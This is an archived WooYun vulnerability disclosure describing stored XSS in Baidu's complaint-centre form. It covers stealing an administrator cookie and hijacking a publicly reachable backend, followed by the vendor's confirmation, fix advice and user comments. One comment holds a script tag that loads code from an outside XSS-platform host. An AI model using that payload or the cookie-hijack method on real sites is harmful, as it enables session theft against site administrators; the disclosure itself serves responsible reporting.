当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09547

漏洞标题:用xss平台沦陷百度投诉中心后台 (原来百度的后台是酱紫的)

相关厂商:百度

漏洞作者: 胯下有杀气

提交时间:2012-07-12 15:05

修复时间:2012-08-26 15:06

公开时间:2012-08-26 15:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-07-12: 细节已通知厂商并且等待厂商处理中
2012-07-13: 厂商已经确认,细节仅向厂商公开
2012-07-23: 细节向核心白帽子及相关领域专家公开
2012-08-02: 细节向普通白帽子公开
2012-08-12: 细节向实习白帽子公开
2012-08-26: 细节向公众公开

简要描述:

天天看wooyun上piapiapia弹窗弹的好欢乐,但是真正利用的没几个,也导致了一些人,一些厂商,一些白帽子对XSS危害的蔑视,如果XSS的利用回想当年NBSI一样简单化,也许结果就不同了。
用事实说话。

详细说明:

我们要知道的一个事实是,很多大型互联网企业,其前台防护都很到位,但是没有人会挑保护最好的地方下手,对于前台来说,他的后台就是一个容易被忽视的地方,虽然我们不知道后台程序的构造,但是我们可以根据一些功能的性质来大胆推测,比如互联网公司安全短板--客服反馈系统。
目标地址:
http://tousu.baidu.com

漏洞证明:

找到一个产品的投诉页面,比如文库,想这种功能比较简单的表单,我们直接提交"><xss code><这样的代码猜测


提交后如果运气好的话。。。。。


访问了一下后台地址,居然是外网可访问的,利用得到的cookie进行会话劫持




还有置顶编辑功能,留个脚印


修复方案:

后台不应该对公网全网开放,另外信息展现需要做输出转义。
cookie全局httponly?

版权声明:转载请注明来源 胯下有杀气@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-07-13 15:23

厂商回复:

很好的案例,各种漏洞的综合利用,感谢提交,我们会尽快处理

最新状态:

暂无

漏洞评价:

评论

  1. 2012-07-12 15:14 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    - - 当年类似的方法,也整过百度贴吧。

  2. 2012-07-12 15:14 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    那么神奇?求利用

  3. 2012-07-12 15:28 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    。。。

  4. 2012-07-12 15:32 | Kaier ( 路人 | Rank:11 漏洞数:1 )

    xss很强大、

  5. 2012-07-12 15:40 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    胯下有杀气。。。

  6. 2012-07-12 15:41 | 胯下有杀气 ( 普通白帽子 | Rank:241 漏洞数:14 | 大姐,你黄瓜掉了。。。)

    你们感觉到我的杀气了么

  7. 2012-07-12 15:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @胯下有杀气 妖孽,哪里走!

  8. 2012-07-12 15:44 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @胯下有杀气 妖孽,哪里走!

  9. 2012-07-12 15:52 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    轻轻的抚摸了@xsser的 软肋

  10. 2012-07-12 15:52 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    @胯下有杀气 妖孽,哪里走!

  11. 2012-07-12 16:27 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @胯下有杀气 发个截图吧 这个看不太清楚

  12. 2012-07-12 16:43 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @胯下有杀气 我突然感觉到杀气,所以就过来继续回复了

  13. 2012-07-12 16:43 | d4rkwind ( 路人 | Rank:8 漏洞数:2 | 关注web 安全,产品安全)

    xss很黄很暴力,厂商需要被教育

  14. 2012-07-12 16:55 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    “天天看wooyun上piapiapia弹窗弹的好欢乐,但是真正利用的没几个”这句话太对了,求教育,求学习

  15. 2012-07-12 17:22 | 请叫我大神 ( 路人 | 还没有发布任何漏洞 | 我叫大仙,法力无边)

    太丢人了~

  16. 2012-07-12 17:29 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    洞主威武~

  17. 2012-07-12 17:41 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    @胯下有杀气 标题霸气,名字霸气,简介更霸气,哥,你偶像呀

  18. 2012-07-12 19:34 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    piapiapia弹窗弹的好欢乐 =。=

  19. 2012-07-13 01:36 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @goderci 昨天刚看完弹窗的恐怖,窃取cookies神马的。伤不起~

  20. 2012-07-13 23:41 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    胯下有杀气。。。

  21. 2012-07-15 10:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    V5~~

  22. 2012-07-17 12:42 | Master ( 路人 | Rank:29 漏洞数:10 )

    @胯下有杀气 此名字很神奇

  23. 2012-07-17 14:24 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    胯下是大杀器。。。

  24. 2012-08-02 15:47 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @xsser 这个平台是你们在搞的?还是洞主自己的?

  25. 2012-08-03 10:52 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

  26. 2012-08-12 19:46 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    看了楼上的 我眼镜表示受不鸟了

  27. 2012-08-14 10:39 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    这个洞好像沦陷了很多站!

  28. 2012-08-22 15:24 | Sunny ( 路人 | Rank:0 漏洞数:1 | 本人已参加中国共产党!中国共产党是中国工...)

    后台地址竟然包含符号……汗、大汗、阿富汗、成吉思汗

  29. 2012-08-26 15:28 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    这个xss平台求开放~

  30. 2012-08-26 17:09 | 往事如烟 ( 路人 | Rank:24 漏洞数:11 | 联系MAIL:121441@qq.com)

    膜拜

  31. 2012-08-26 17:10 | ufohacker ( 路人 | Rank:3 漏洞数:1 | 提高的是能力不是技术!)

    喵了个咪,跨站代码哪里去了?

  32. 2012-08-30 09:33 | DarkSun.Evil ( 路人 | Rank:14 漏洞数:2 | 请多关照...Thx...)

    膜拜啊,真心的,真真的! 我等小菜,继续努力学习啊!

  33. 2012-09-02 11:04 | 245661320 ( 路人 | Rank:1 漏洞数:3 | 永无边境的黑暗!)

    @胯下有杀气 那是神马工具呢 求共享

  34. 2012-12-13 13:08 | ver007 ( 路人 | Rank:18 漏洞数:5 | ver007爱好技术)

    <script src="http://www.ieroot.com/xsser/?u=937536" > </script>

  35. 2013-08-24 18:31 | 二叉树 ( 路人 | Rank:0 漏洞数:3 | 终于有账号了)

    piapiapia